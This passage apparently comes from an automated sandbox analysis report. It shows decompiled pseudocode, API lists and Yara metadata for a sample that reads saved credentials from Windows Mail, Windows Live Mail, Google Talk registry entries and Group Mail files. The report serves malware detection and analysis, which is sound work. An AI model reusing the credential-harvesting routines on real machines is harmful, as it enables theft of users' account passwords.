									__eflags = _t9;
									 *(_t71 - 0x1c) = _t57 & 0xffffff00 | _t9;
								}
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t71 - 4) = 0;
				__set_app_type(2);
				 *0x417b6c =  *0x417b6c | 0xffffffff;
				 *0x417b70 =  *0x417b70 | 0xffffffff;
				_t35 = __p__fmode();
				_t62 =  *0x416b8c; // 0x0
				 *_t35 = _t62;
				_t36 = __p__commode();
				_t63 =  *0x416b88; // 0x0
				 *_t36 = _t63;
				 *0x417b68 =  *_adjust_fdiv;
				_t39 = E00401A4D();
				_t79 =  *0x416000; // 0x1
				if(_t79 == 0) {
					__setusermatherr(E00401A4D);
					_pop(_t63);
				}
				E0041182C(_t39);
				_push(0x4123b0);
				_push(0x4123ac);
				L00411826();
				_t41 =  *0x416b84; // 0x0
				 *(_t71 - 0x20) = _t41;
				 *(_t71 - 0x30) = __getmainargs(_t71 - 0x2c, _t71 - 0x28, _t71 - 0x24,  *0x416b80, _t71 - 0x20);
				_push(0x4123a8);
				_push(0x412394); // executed
				L00411826(); // executed
				_t69 =  *_acmdln;
				 *((intOrPtr*)(_t71 - 0x34)) = _t69;
				if( *_t69 != 0x22) {
					while(1) {
						__eflags =  *_t69 - 0x20;
						if(__eflags <= 0) {
							goto L17;
						}
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				} else {
					do {
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
						_t55 =  *_t69;
					} while (_t55 != 0 && _t55 != 0x22);
					if( *_t69 == 0x22) {
						L16:
						_t69 = _t69 + 1;
						 *((intOrPtr*)(_t71 - 0x34)) = _t69;
					}
				}
				L17:
				_t48 =  *_t69;
				if(_t48 != 0 && _t48 <= 0x20) {
					goto L16;
				}
				 *(_t71 - 0x4c) = 0;
				GetStartupInfoA(_t71 - 0x78);
				_t87 =  *(_t71 - 0x4c) & 0x00000001;
				if(( *(_t71 - 0x4c) & 0x00000001) == 0) {
					_t50 = 0xa;
				} else {
					_t50 =  *(_t71 - 0x48) & 0x0000ffff;
				}
				_t52 = E0040B9AD(_t63, _t87, GetModuleHandleA(0), 0, _t69, _t50); // executed
				_t70 = _t52;
				 *(_t71 - 0x7c) = _t70;
				if( *(_t71 - 0x1c) == 0) {
					exit(_t70); // executed
				}
				__imp___cexit();
				 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
				return E00411879(_t70);
			}





















                                                  0x00411654
                                                  0x00411656
                                                  0x0041165b
                                                  0x00411669
                                                  0x00411670
                                                  0x00411691
                                                  0x00411691
                                                  0x00411672
                                                  0x00411675
                                                  0x0041167d
                                                  0x00000000
                                                  0x0041167f
                                                  0x0041167f
                                                  0x00411688
                                                  0x004116a9
                                                  0x004116ad
                                                  0x00000000
                                                  0x004116af
                                                  0x004116af
                                                  0x004116b1
                                                  0x00000000
                                                  0x004116b1
                                                  0x0041168a
                                                  0x0041168f
                                                  0x00411696
                                                  0x0041169d
                                                  0x00000000
                                                  0x0041169f
                                                  0x0041169f
                                                  0x004116a1
                                                  0x004116b7
                                                  0x004116b7
                                                  0x004116b7
                                                  0x004116ba
                                                  0x004116ba
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0041168f
                                                  0x00411688
                                                  0x0041167d
                                                  0x004116bd
                                                  0x004116c2
                                                  0x004116c9
                                                  0x004116d0
                                                  0x004116d7
                                                  0x004116dd
                                                  0x004116e3
                                                  0x004116e5
                                                  0x004116eb
                                                  0x004116f1
                                                  0x004116fa
                                                  0x004116ff
                                                  0x00411704
                                                  0x0041170a
                                                  0x00411711
                                                  0x00411717
                                                  0x00411717
                                                  0x00411718
                                                  0x0041171d
                                                  0x00411722
                                                  0x00411727
                                                  0x0041172c
                                                  0x00411731
                                                  0x00411750
                                                  0x00411753
                                                  0x00411758
                                                  0x0041175d
                                                  0x0041176a
                                                  0x0041176c
                                                  0x00411772
                                                  0x004117ae
                                                  0x004117ae
                                                  0x004117b1
                                                  0x00000000
                                                  0x00000000
                                                  0x004117b3
                                                  0x004117b4
                                                  0x004117b4
                                                  0x00411774
                                                  0x00411774
                                                  0x00411774
                                                  0x00411775
                                                  0x00411778
                                                  0x0041177a
                                                  0x00411785
                                                  0x00411787
                                                  0x00411787
                                                  0x00411788
                                                  0x00411788
                                                  0x00411785
                                                  0x0041178b
                                                  0x0041178b
                                                  0x0041178f
                                                  0x00000000
                                                  0x00000000
                                                  0x00411795
                                                  0x0041179c
                                                  0x004117a2
                                                  0x004117a6
                                                  0x004117bb
                                                  0x004117a8
                                                  0x004117a8
                                                  0x004117a8
                                                  0x004117c3
                                                  0x004117c8
                                                  0x004117ca
                                                  0x004117d0
                                                  0x004117d3
                                                  0x004117d3
                                                  0x004117d9
                                                  0x0041180e
                                                  0x00411819

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                  • String ID:
                                                  • API String ID: 3662548030-0
                                                  • Opcode ID: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                  • Instruction ID: d7daaed26df3896bd014a213398510a4c94beeaf1e1b2d32e797684dc565bfa8
                                                  • Opcode Fuzzy Hash: d1e6738c7006840e8ff29ac4bb5a107ed27e41239026a4511230c59facba65b5
                                                  • Instruction Fuzzy Hash: 60416DB0D40218DFCB209FA4D984AED7BB4AB08314F24857BE661D72A1D77D99C2CB5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00410D1B, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E00410D1B(void* __eflags, intOrPtr _a4) {
				void _v275;
				char _v276;
				char _v532;
				void _v539;
				char _v540;
				void _v795;
				char _v796;
				void* __edi;
				void* __esi;
				int _t44;
				char* _t46;
				char* _t48;
				void* _t64;
				intOrPtr _t65;
				void* _t66;
				signed int _t68;
				void* _t74;
				void* _t75;

				_t75 = __eflags;
				_v796 = 0;
				memset( &_v795, 0, 0x104);
				_t64 = 0x1c;
				_t61 =  &_v796;
				 *((intOrPtr*)(_a4 + 4)) = 1;
				E0040EE59( &_v796, _t64); // executed
				E00406734( &_v796, "\\Microsoft\\Windows Mail");
				_t65 = _a4;
				E00410C43(_t65, _t75, _t61); // executed
				 *((intOrPtr*)(_t65 + 4)) = 2;
				_t66 = 0x1c;
				E0040EE59(_t61, _t66);
				E00406734(_t61, "\\Microsoft\\Windows Live Mail");
				E00410C43(_a4, _t75, _t61); // executed
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				_v540 = 0;
				memset( &_v539, 0, 0x104);
				E0040EBC1(_a4, 0x80000001, "Software\\Microsoft\\Windows Live Mail", "Store Root",  &_v276, 0x104); // executed
				_t74 = (_t68 & 0xfffffff8) - 0x31c + 0x38;
				ExpandEnvironmentStringsA( &_v276,  &_v540, 0x104);
				_t44 = strlen( &_v540);
				if(_t44 > 0) {
					_t48 = _t74 + _t44 + 0x117;
					if( *_t48 == 0x5c) {
						 *_t48 = 0;
					}
				}
				_push( &_v532);
				_t46 =  &_v796;
				_push(_t46);
				L004115B2();
				_t78 = _t46;
				if(_t46 != 0) {
					_t46 = E00410C43(_a4, _t78,  &_v532); // executed
				}
				return _t46;
			}





















                                                  0x00410d1b
                                                  0x00410d37
                                                  0x00410d3c
                                                  0x00410d49
                                                  0x00410d4a
                                                  0x00410d4e
                                                  0x00410d55
                                                  0x00410d5f
                                                  0x00410d64
                                                  0x00410d6d
                                                  0x00410d72
                                                  0x00410d7b
                                                  0x00410d7c
                                                  0x00410d86
                                                  0x00410d92
                                                  0x00410da2
                                                  0x00410daa
                                                  0x00410dbd
                                                  0x00410dc5
                                                  0x00410de5
                                                  0x00410dea
                                                  0x00410dfe
                                                  0x00410e0c
                                                  0x00410e14
                                                  0x00410e16
                                                  0x00410e20
                                                  0x00410e22
                                                  0x00410e22
                                                  0x00410e20
                                                  0x00410e2c
                                                  0x00410e2d
                                                  0x00410e31
                                                  0x00410e32
                                                  0x00410e37
                                                  0x00410e3b
                                                  0x00410e48
                                                  0x00410e48
                                                  0x00410e53

                                                  APIs
                                                  • memset.MSVCRT ref: 00410D3C
                                                    • Part of subcall function 00406734: strlen.MSVCRT ref: 00406736
                                                    • Part of subcall function 00406734: strlen.MSVCRT ref: 00406741
                                                    • Part of subcall function 00406734: strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                    • Part of subcall function 0040EE59: memset.MSVCRT ref: 0040EEAE
                                                    • Part of subcall function 0040EE59: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                    • Part of subcall function 0040EE59: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                  • memset.MSVCRT ref: 00410DAA
                                                  • memset.MSVCRT ref: 00410DC5
                                                    • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 00410DFE
                                                  • strlen.MSVCRT ref: 00410E0C
                                                  • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 00410E32
                                                  Strings
                                                  • \Microsoft\Windows Live Mail, xrefs: 00410D81
                                                  • \Microsoft\Windows Mail, xrefs: 00410D5A
                                                  • Software\Microsoft\Windows Live Mail, xrefs: 00410DDB
                                                  • Store Root, xrefs: 00410DD6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
                                                  • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                  • API String ID: 4071991895-2578778931
                                                  • Opcode ID: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                  • Instruction ID: 656a87abbde68b626b6b67706479efffa51c3f1aad4b8967eb2d69b922da332e
                                                  • Opcode Fuzzy Hash: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                  • Instruction Fuzzy Hash: 3D318DB2548348ABD324E799DC46FCB77DC9BC4318F04482FF649D7182E678D68487AA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004037B1, Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E004037B1(void* __ecx, void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;
				char _v404;
				intOrPtr _v408;
				char _v792;
				intOrPtr _v796;
				char _v924;
				char _v936;
				void _v1959;
				char _v1960;
				void _v2983;
				char _v2984;
				void* __ebx;
				void* __esi;
				void* _t28;
				void* _t50;
				void* _t51;
				char* _t59;
				char* _t63;
				void* _t70;

				_t70 = __fp0;
				_t51 = __ecx;
				_v1960 = 0;
				memset( &_v1959, 0, 0x3ff);
				_v2984 = 0;
				memset( &_v2983, 0, 0x3ff);
				_t28 = E00410F79(_t51,  &_v2984,  &_v1960); // executed
				if(_t28 == 0) {
					return _t28;
				}
				E004021D8( &_v936);
				_push( &_v1960);
				_t50 = 0x7f;
				E004060D0(_t50,  &_v276);
				_t59 =  &_v404;
				E004060D0(_t50, _t59,  &_v2984);
				_v796 = 9;
				_v408 = 3;
				_t63 = strchr(_t59, 0x40);
				_push( &_v404);
				if(_t63 == 0) {
					if(strlen() + 0xa < 0) {
						sprintf( &_v792, "%s@yahoo.com",  &_v404);
					}
				} else {
					strcpy( &_v792, ??);
					 *_t63 = 0;
				}
				strcpy( &_v924,  &_v404);
				return E00402407( &_v936, _t70, _a4);
			}






















                                                  0x004037b1
                                                  0x004037b1
                                                  0x004037cc
                                                  0x004037d2
                                                  0x004037e0
                                                  0x004037e6
                                                  0x004037fc
                                                  0x00403803
                                                  0x004038cc
                                                  0x004038cc
                                                  0x00403810
                                                  0x0040381b
                                                  0x0040381e
                                                  0x00403825
                                                  0x00403831
                                                  0x00403837
                                                  0x00403841
                                                  0x0040384b
                                                  0x0040385d
                                                  0x00403868
                                                  0x00403869
                                                  0x00403889
                                                  0x0040389e
                                                  0x004038a3
                                                  0x0040386b
                                                  0x00403872
                                                  0x00403879
                                                  0x00403879
                                                  0x004038b4
                                                  0x00000000

                                                  APIs
                                                  • memset.MSVCRT ref: 004037D2
                                                  • memset.MSVCRT ref: 004037E6
                                                    • Part of subcall function 00410F79: memset.MSVCRT ref: 00410F9B
                                                    • Part of subcall function 00410F79: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                    • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                    • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                  • strchr.MSVCRT ref: 00403855
                                                  • strcpy.MSVCRT(?,?,?,?,?), ref: 00403872
                                                  • strlen.MSVCRT ref: 0040387E
                                                  • sprintf.MSVCRT ref: 0040389E
                                                  • strcpy.MSVCRT(?,?,?,?,?), ref: 004038B4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$strcpystrlen$Closememcpysprintfstrchr
                                                  • String ID: %s@yahoo.com
                                                  • API String ID: 1649821605-3288273942
                                                  • Opcode ID: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                  • Instruction ID: 59c64947ec9ad5e5fa7ad27033647646f0aae9e06f6053b7dc62ef58ab254070
                                                  • Opcode Fuzzy Hash: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                  • Instruction Fuzzy Hash: 592184B3D0412C6EDB21EB55DD41FDA77AC9F85308F0404EBB64DE6041E6B8AB848BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004034CB, Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 47stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004034CB(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t23;
				char* _t28;

				_t23 = __ecx;
				_v532 = 0;
				memset( &_v531, 0, 0x104);
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t15 = E0040EBC1(_t23, 0x80000002, "Software\\Group Mail", "InstallPath",  &_v532, 0xfa); // executed
				if(_t15 != 0) {
					strcpy( &_v268,  &_v532);
					_t28 =  &_v268;
					E00405F1F(_t28);
					strcat(_t28, "fb.dat");
					return E004033D7(_t28, __fp0, _a4);
				}
				return _t15;
			}












                                                  0x004034cb
                                                  0x004034e4
                                                  0x004034eb
                                                  0x004034fa
                                                  0x00403501
                                                  0x00403521
                                                  0x0040352b
                                                  0x0040353c
                                                  0x00403541
                                                  0x00403547
                                                  0x00403554
                                                  0x00000000
                                                  0x00403566
                                                  0x00403569

                                                  APIs
                                                  • memset.MSVCRT ref: 004034EB
                                                  • memset.MSVCRT ref: 00403501
                                                    • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                  • strcpy.MSVCRT(00000000,00000000), ref: 0040353C
                                                    • Part of subcall function 00405F1F: strlen.MSVCRT ref: 00405F20
                                                    • Part of subcall function 00405F1F: strcat.MSVCRT(00000000,00413044,004062BF,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 00405F37
                                                  • strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 00403554
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetstrcat$Closestrcpystrlen
                                                  • String ID: InstallPath$Software\Group Mail$fb.dat
                                                  • API String ID: 1387626053-966475738
                                                  • Opcode ID: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                  • Instruction ID: 7ff2b4ee0b8a45595852750e2855a272ac8b2b1e575441dca18af6517dfb7442
                                                  • Opcode Fuzzy Hash: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                  • Instruction Fuzzy Hash: 2E01FC72D8012C75D720E6669C46FDA766C8F64745F0004A6BA4AF20C2DAFCABD48B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040754D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E0040754D(void* __ecx, void* __eflags, int _a4, char _a8, char _a12, void _a13, char _a268, void _a269) {
				void* _v0;
				char _v4;
				long _t29;
				void* _t33;
				void* _t36;
				signed int _t54;
				void* _t56;
				void* _t57;
				void* _t58;

				_t50 = __ecx;
				E004118A0(0x1110, __ecx);
				E0040724C(_a4); // executed
				_t29 = E0040EB3F(0x80000001, "Software\\Google\\Google Talk\\Accounts",  &_v4);
				_t56 = (_t54 & 0xfffffff8) + 0xc;
				if(_t29 == 0) {
					_a4 = 0;
					_a12 = 0;
					memset( &_a13, 0, 0xff);
					_t57 = _t56 + 0xc;
					_t33 = E0040EC05(_v0, 0,  &_a12);
					while(1) {
						_t58 = _t57 + 0xc;
						if(_t33 != 0) {
							break;
						}
						_t36 = E0040EB3F(_v0,  &_a12,  &_a8);
						_t57 = _t58 + 0xc;
						if(_t36 == 0) {
							_a268 = 0;
							memset( &_a269, 0, 0xfff);
							E0040EB80(0xfff, _t50, _a8, "pw",  &_a268);
							_t57 = _t57 + 0x18;
							E00407406( &_a268, _a4,  &_a12);
							RegCloseKey(_v0);
						}
						_a4 = _a4 + 1;
						_t33 = E0040EC05(_v0, _a4,  &_a12);
					}
					_t29 = RegCloseKey(_v0);
				}
				return _t29;
			}












                                                  0x0040754d
                                                  0x00407558
                                                  0x00407562
                                                  0x00407576
                                                  0x0040757b
                                                  0x00407580
                                                  0x00407593
                                                  0x00407597
                                                  0x0040759b
                                                  0x004075a0
                                                  0x004075ad
                                                  0x00407642
                                                  0x00407642
                                                  0x00407647
                                                  0x00000000
                                                  0x00000000
                                                  0x004075cb
                                                  0x004075d0
                                                  0x004075d5
                                                  0x004075e5
                                                  0x004075ec
                                                  0x0040760a
                                                  0x0040760f
                                                  0x00407621
                                                  0x0040762a
                                                  0x0040762a
                                                  0x0040762c
                                                  0x0040763d
                                                  0x0040763d
                                                  0x00407651
                                                  0x00407651
                                                  0x00407658

                                                  APIs
                                                    • Part of subcall function 0040724C: memset.MSVCRT ref: 004072AE
                                                    • Part of subcall function 0040724C: memset.MSVCRT ref: 004072C2
                                                    • Part of subcall function 0040724C: memset.MSVCRT ref: 004072DC
                                                    • Part of subcall function 0040724C: memset.MSVCRT ref: 004072F1
                                                    • Part of subcall function 0040724C: GetComputerNameA.KERNEL32 ref: 00407313
                                                    • Part of subcall function 0040724C: GetUserNameA.ADVAPI32(?,?), ref: 00407327
                                                    • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
                                                    • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
                                                    • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407364
                                                    • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407373
                                                    • Part of subcall function 0040724C: memcpy.MSVCRT ref: 00407385
                                                    • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                  • memset.MSVCRT ref: 0040759B
                                                    • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                  • memset.MSVCRT ref: 004075EC
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 0040762A
                                                  • RegCloseKey.ADVAPI32(?), ref: 00407651
                                                  Strings
                                                  • Software\Google\Google Talk\Accounts, xrefs: 0040756C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                  • String ID: Software\Google\Google Talk\Accounts
                                                  • API String ID: 2959138223-1079885057
                                                  • Opcode ID: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                  • Instruction ID: 125b9810afc719f5725a34431a69a8fbc80fc1372edd2e7206a69bc0ee1a9f38
                                                  • Opcode Fuzzy Hash: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                  • Instruction Fuzzy Hash: 6A21887150820A6FD610EF51DC42DEBB7ECDF94344F00083AF945E1191E635D96D9BA7
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040A5AC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 64%
                                                  			E0040A5AC(void* __eax) {
				void* __esi;
				_Unknown_base(*)()* _t26;
				void* _t31;
				intOrPtr _t34;
				char* _t44;
				void* _t45;
				intOrPtr* _t46;
				int _t47;

				_t45 = __eax;
				_t37 =  *((intOrPtr*)(__eax + 0x37c));
				_t47 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x37c)) + 0x30)) > 0) {
					do {
						_t31 = E00406DEB(_t47, _t37);
						_push(_t31);
						_push("/sort");
						L004115C4();
						if(_t31 == 0) {
							_t4 = _t47 + 1; // 0x1
							_t44 = E00406DEB(_t4,  *((intOrPtr*)(_t45 + 0x37c)));
							_t54 =  *_t44 - 0x7e;
							_t34 =  *((intOrPtr*)(_t45 + 0x370));
							if( *_t44 != 0x7e) {
								_push(0);
							} else {
								_push(1);
								_t44 = _t44 + 1;
							}
							_push(_t44);
							E0040A119(_t34, _t54);
						}
						_t37 =  *((intOrPtr*)(_t45 + 0x37c));
						_t47 = _t47 + 1;
					} while (_t47 <  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x37c)) + 0x30)));
				}
				E00405E2C();
				 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)) + 0x28)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)))) + 0x5c))();
				if(E00406DFB( *((intOrPtr*)(_t45 + 0x37c)), "/nosort") == 0xffffffff) {
					_t46 =  *((intOrPtr*)(_t45 + 0x370));
					if( *0x41748c == 0) {
						 *0x417490 =  *((intOrPtr*)(_t46 + 0x1ac));
						 *0x41748c = 1;
					}
					_t26 =  *((intOrPtr*)( *_t46 + 0x60))(E0040A0F3);
					qsort( *((intOrPtr*)( *_t46 + 0x64))(), 0,  *(_t46 + 0x28), _t26);
				}
				return SetCursor( *0x416b98);
			}











                                                  0x0040a5af
                                                  0x0040a5b1
                                                  0x0040a5b9
                                                  0x0040a5be
                                                  0x0040a5c0
                                                  0x0040a5c2
                                                  0x0040a5c7
                                                  0x0040a5c8
                                                  0x0040a5cd
                                                  0x0040a5d6
                                                  0x0040a5de
                                                  0x0040a5e6
                                                  0x0040a5e8
                                                  0x0040a5eb
                                                  0x0040a5f1
                                                  0x0040a5f8
                                                  0x0040a5f3
                                                  0x0040a5f3
                                                  0x0040a5f5
                                                  0x0040a5f5
                                                  0x0040a5f9
                                                  0x0040a5fa
                                                  0x0040a5fa
                                                  0x0040a5ff
                                                  0x0040a605
                                                  0x0040a606
                                                  0x0040a5c0
                                                  0x0040a60b
                                                  0x0040a616
                                                  0x0040a621
                                                  0x0040a637
                                                  0x0040a63f
                                                  0x0040a645
                                                  0x0040a64d
                                                  0x0040a652
                                                  0x0040a652
                                                  0x0040a668
                                                  0x0040a676
                                                  0x0040a67b
                                                  0x0040a68d

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Cursor_mbsicmpqsort
                                                  • String ID: /nosort$/sort
                                                  • API String ID: 882979914-1578091866
                                                  • Opcode ID: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                  • Instruction ID: 1813cf3d9500be1981e9bba0c11058464626672cad6922460886ab76c06e8bc1
                                                  • Opcode Fuzzy Hash: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                  • Instruction Fuzzy Hash: 4921B071304601EFC719AF75C880A99B7A9BF08314B10017EF429A7291CB39A9628B8A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040EE59, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registrystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 25%
                                                  			E0040EE59(char* __edi, void* __esi) {
				void* _v8;
				char _v40;
				void _v299;
				char _v300;
				void* _t32;
				char* _t37;
				void* _t38;

				_t38 = __esi;
				_t37 = __edi;
				E0040EDAC();
				if( *0x41751c == 0 ||  *((intOrPtr*)(E00406278() + 0x10)) == 1 && (__esi == 0x19 || __esi == 0x17 || __esi == 0x16)) {
					_v300 = 0;
					memset( &_v299, 0, 0x103);
					if(_t38 == 0x19 || _t38 == 0x17 || _t38 == 0x16) {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000002);
					} else {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000001);
					}
					if(E0040EB3F() == 0) {
						E0040EDDB(_t38);
						E0040EB80(0x104,  &_v40, _v8,  &_v40,  &_v300);
						RegCloseKey(_v8);
					}
					strcpy(_t37,  &_v300);
					return 0 |  *_t37 != 0x00000000;
				} else {
					_t32 =  *0x41751c(0, _t37, _t38, 0); // executed
					return _t32;
				}
			}










                                                  0x0040ee59
                                                  0x0040ee59
                                                  0x0040ee63
                                                  0x0040ee70
                                                  0x0040eea8
                                                  0x0040eeae
                                                  0x0040eeb9
                                                  0x0040eec8
                                                  0x0040eec9
                                                  0x0040eece
                                                  0x0040eed5
                                                  0x0040eed8
                                                  0x0040eed9
                                                  0x0040eede
                                                  0x0040eede
                                                  0x0040eeed
                                                  0x0040eef4
                                                  0x0040ef0c
                                                  0x0040ef17
                                                  0x0040ef17
                                                  0x0040ef25
                                                  0x00000000
                                                  0x0040ee8c
                                                  0x0040ee90
                                                  0x00000000
                                                  0x0040ee90

                                                  APIs
                                                    • Part of subcall function 0040EDAC: LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,74B04DE0,?,00000000), ref: 0040EDBA
                                                    • Part of subcall function 0040EDAC: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                  • memset.MSVCRT ref: 0040EEAE
                                                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                  • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                    • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040EEC9, 0040EED9
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                  • API String ID: 181880968-2036018995
                                                  • Opcode ID: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                  • Instruction ID: b4f7ca4f0d473bdd6f3573a0ab4a655380742daec172f7a18688454dd959f7ad
